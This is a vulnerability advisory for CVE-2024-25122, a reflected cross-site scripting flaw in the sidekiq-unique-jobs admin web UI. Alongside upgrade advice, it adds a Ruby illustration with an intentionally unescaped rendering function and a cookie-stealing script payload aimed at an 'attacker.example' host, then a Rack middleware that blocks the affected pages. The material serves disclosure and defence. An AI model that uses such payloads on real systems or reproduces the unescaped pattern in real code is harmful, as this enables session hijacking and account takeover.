PT-2024-20763 · Unknown · Sidekiq-Unique-Jobs

Pboling · Published 2024-02-13 · Updated 2024-10-11 · CVE-2024-25122 · CVSS v3.1 7.1 High · Vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
Name of the Vulnerable Software and Affected Versions: sidekiq-unique-jobs, 7.x releases before 7.1.33 and 8.x releases before 8.0.7
Description: The sidekiq-unique-jobs "admin" web UI, an extension of Sidekiq::Web, reflects specially crafted GET request parameters into the pages served by the "/changelogs", "/locks" and "/expiring locks" endpoints without escaping them (Cross-Site Scripting, XSS). An attacker who gets an authorized user to open a crafted link, or a super-user who crafts one, can run script in the victim's browser within the origin of the admin UI, potentially stealing cookies, session data, or local storage data and acting with the victim's session. Exploitation needs no privileges on the target (PR:N) but requires the victim to open the link (UI:R), which is what the CVSS vector above encodes. Because sidekiq-unique-jobs is widely deployed across the industry, the exposure is broad.
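The following is an added example, not code from sidekiq-unique-jobs or from the advisory. It models the class of bug described above: a Sidekiq::Web extension page that reflects a GET parameter (a hypothetical "filter" on a /locks listing, assumed here for illustration) into HTML, first verbatim and then through ERB::Util.html_escape, with a constructed cookie-stealing payload to show the difference.

```ruby
require "erb"

# Constructed example, not code from sidekiq-unique-jobs. It models a
# Sidekiq::Web extension page that reflects a GET parameter (here a
# hypothetical "filter" used to narrow the /locks listing) back into HTML.

# Vulnerable: the parameter is interpolated into the page verbatim, so a
# value containing quotes and angle brackets becomes live markup.
def render_locks_vulnerable(params)
  filter = params.fetch("filter", "")
  <<~HTML
    <form method="get">
      <input type="text" name="filter" value="#{filter}">
    </form>
    <p>Showing locks matching: #{filter}</p>
  HTML
end

# Hardened: every reflected value passes through ERB::Util.html_escape,
# which encodes & < > " ' so the browser renders it as text, not markup.
def render_locks_hardened(params)
  filter = ERB::Util.html_escape(params.fetch("filter", ""))
  <<~HTML
    <form method="get">
      <input type="text" name="filter" value="#{filter}">
    </form>
    <p>Showing locks matching: #{filter}</p>
  HTML
end

# Constructed payload an attacker would place in the link sent to a victim.
# It closes the value attribute and the input tag, then injects a script
# that exfiltrates document.cookie to an attacker-controlled host.
PAYLOAD = %q{"><script>document.location="https://attacker.example/?c="+document.cookie</script>}

# Returns true when the payload survives into the output as a live tag.
def script_injected?(html)
  html.include?("<script>")
end

# The escaped form that a correct page emits instead of the raw payload.
def escaped_payload
  ERB::Util.html_escape(PAYLOAD)
end

if $PROGRAM_NAME == __FILE__
  params = { "filter" => PAYLOAD }
  puts "vulnerable renders script: #{script_injected?(render_locks_vulnerable(params))}"
  puts "hardened renders script:   #{script_injected?(render_locks_hardened(params))}"
end
```

The same escaping must be applied to every reflected value, including those placed inside attributes, since the payload above relies on breaking out of the `value` attribute before it ever writes a tag.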
Recommendations: Upgrade to version 7.1.33 (7.x) or 8.0.7 (8.x), or later. Until the upgrade is deployed, restrict access to the vulnerable endpoints "/changelogs", "/locks" and "/expiring locks", for example by blocking them in front of the application or at the Rack layer. Independently of the patch, never expose the "admin" UI anonymously: Sidekiq::Web ships without authentication, so mount it behind the application's own authentication and authorization (a Rails routes constraint, Rack::Auth::Basic, or similar) so that only administrators can reach these pages at all. This does not remove the XSS, since a logged-in administrator can still be lured to a crafted link, but it narrows the set of viable victims.
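One way to implement the temporary endpoint restriction, as an added example that is not part of the advisory or of the gem: a plain Rack middleware that returns 403 for the affected pages unless the request has already been marked as an administrator's. It assumes (hypothetically) that the pages are mounted inside Sidekiq::Web so `PATH_INFO` is relative to the mount point, that the route paths are `/changelogs`, `/locks` and `/expiring_locks`, and that an upstream authentication layer sets `env["app.admin"] = true` for administrators; the `Sidekiq::Web.use` registration is the real Sidekiq API for adding middleware to the web UI.

```ruby
# Added example, not code from sidekiq-unique-jobs or Sidekiq. A Rack
# middleware that denies requests to the vulnerable sidekiq-unique-jobs
# pages unless an upstream authentication layer has flagged the request
# as an administrator's. No gem is required: a Rack middleware is just an
# object responding to call(env).
#
# Assumptions (hypothetical, adjust to your app): the pages are mounted
# inside Sidekiq::Web so PATH_INFO is relative to the mount point, the
# route paths are /changelogs, /locks and /expiring_locks, and upstream
# authentication sets env["app.admin"] = true for administrators.
class RestrictUniqueJobsUi
  # Anchored at the start of the path and followed by "/" or end of string,
  # so /locks and /locks/<digest> match but /lockscreen does not.
  BLOCKED = %r{\A/(changelogs|locks|expiring_locks)(/|\z)}

  def initialize(app, flag: "app.admin")
    @app = app
    @flag = flag
  end

  def call(env)
    path = env["PATH_INFO"].to_s
    if path.match?(BLOCKED) && env[@flag] != true
      return [403, { "content-type" => "text/plain" }, ["Forbidden\n"]]
    end
    @app.call(env)
  end
end

# Usage in config/initializers/sidekiq.rb (assumes Sidekiq::Web is
# already mounted behind your authentication, which sets the flag):
#   Sidekiq::Web.use RestrictUniqueJobsUi

# Builds a minimal constructed Rack env hash for local testing.
def rack_env(path, admin: false)
  env = { "REQUEST_METHOD" => "GET", "PATH_INFO" => path, "QUERY_STRING" => "" }
  env["app.admin"] = true if admin
  env
end

# Returns the status the middleware yields for a path, with a stub app
# downstream that always answers 200.
def status_for(path, admin: false)
  app = ->(_env) { [200, { "content-type" => "text/plain" }, ["ok\n"]] }
  RestrictUniqueJobsUi.new(app).call(rack_env(path, admin: admin)).first
end

if $PROGRAM_NAME == __FILE__
  %w[/locks /expiring_locks /changelogs /queues].each do |p|
    puts "#{p}: anonymous=#{status_for(p)} admin=#{status_for(p, admin: true)}"
  end
end
```

Blocking on the path rather than inspecting query parameters is deliberate: the advisory does not enumerate which parameters are reflected, so any attempt to filter specific values would be guesswork, whereas denying the three pages removes the reflection surface entirely until the upgrade lands.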

Weakness Enumeration

Cross-Site Scripting (XSS, CWE-79)

Related Identifiers

CVE-2024-25122
GHSA-CMH9-RX85-XJ38

Affected Products

Sidekiq-Unique-Jobs